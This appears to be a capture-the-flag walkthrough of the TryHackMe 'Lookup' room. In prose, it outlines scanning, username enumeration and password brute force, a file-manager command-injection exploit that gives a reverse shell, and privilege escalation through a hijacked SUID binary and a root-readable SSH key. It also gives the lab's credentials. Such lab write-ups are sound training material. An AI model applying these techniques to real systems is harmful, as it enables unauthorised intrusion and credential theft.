In this post, we have a TryHackMe boot-to-root machine named lookup. In this machine, we go through the typical steps by starting with Nmap scanning and enumeration. We find a login form. We decided to create a python script to find the correct username and then use Hydra to find the password. After successful authentication, we have a file manager hosted on a subdomain and the version of this web application is vulnerable to a php command injection. The exploit can be run through Metasploit to obtain initial foothold as www-data. We move horizontally first by exploiting a misconfigured Linux binary then we use GTFObins to obtain root.
1. Initial Scanning
- The presenter starts with an Nmap scan to identify open ports and services on the target machine. The scan reveals:
- Port 22: SSH
- Port 80: HTTP
- Aggressive scanning is used since this is a test environment, avoiding triggering production firewalls.
2. Web Application Enumeration
- Accessing the web service on port 80 reveals a login form. The domain is added to the host file for accessibility.
- Attempts are made to log in using default credentials (admin:admin), but they fail.
- Using Burp Suite, the presenter intercepts HTTP requests and identifies differences in server responses for valid and invalid usernames and passwords.
3. Brute Force Attack
- A Python script is created to enumerate valid usernames using server responses.
- The script identifies two valid usernames: admin and Jose.
- Hydra is used to brute-force the password for the user Jose, resulting in the discovery of the password: password123.
4. Exploitation of the Web Application
- After logging in as Jose, the interface displays a file manager with various files.
- The presenter identifies a file named credentials, containing a username (think) but no password.
- Information about the web application (Linder) reveals it is vulnerable to exploitation.
- Using SearchSploit, the presenter finds an exploit matching the application’s version and uses it to gain a reverse shell on the machine.
5. Privilege Escalation
- The initial shell runs as the www-data user. The goal is to escalate to think and then root.
- Exploring the system reveals a SUID binary named pwm. This binary executes commands with elevated privileges.
- By creating a fake id command, the presenter tricks pwm into believing it is running as think. This grants access to think‘s home directory and a file named passwords.
6. Further Enumeration and Root Escalation
- Using the discovered passwords, Hydra brute-forces SSH credentials for think.
- Logging in as think, enumeration reveals the user can execute a binary (look) as root.
- The binary allows accessing sensitive files, including the root user’s private SSH key.
- Using the key, the presenter logs in as root and retrieves both user and root flags.
Key Techniques Demonstrated
- Reconnaissance: Utilizing Nmap and Burp Suite for initial scans and enumeration.
- Brute Forcing: Using custom scripts and tools like Hydra to discover credentials.
- Exploitation: Identifying and exploiting vulnerabilities using tools like SearchSploit.
- Privilege Escalation: Employing creative methods like SUID binary exploitation and file access to gain root access.
TryHackMe Lookup | Room Answers
Room answers can be found here.
Video Walkthrough
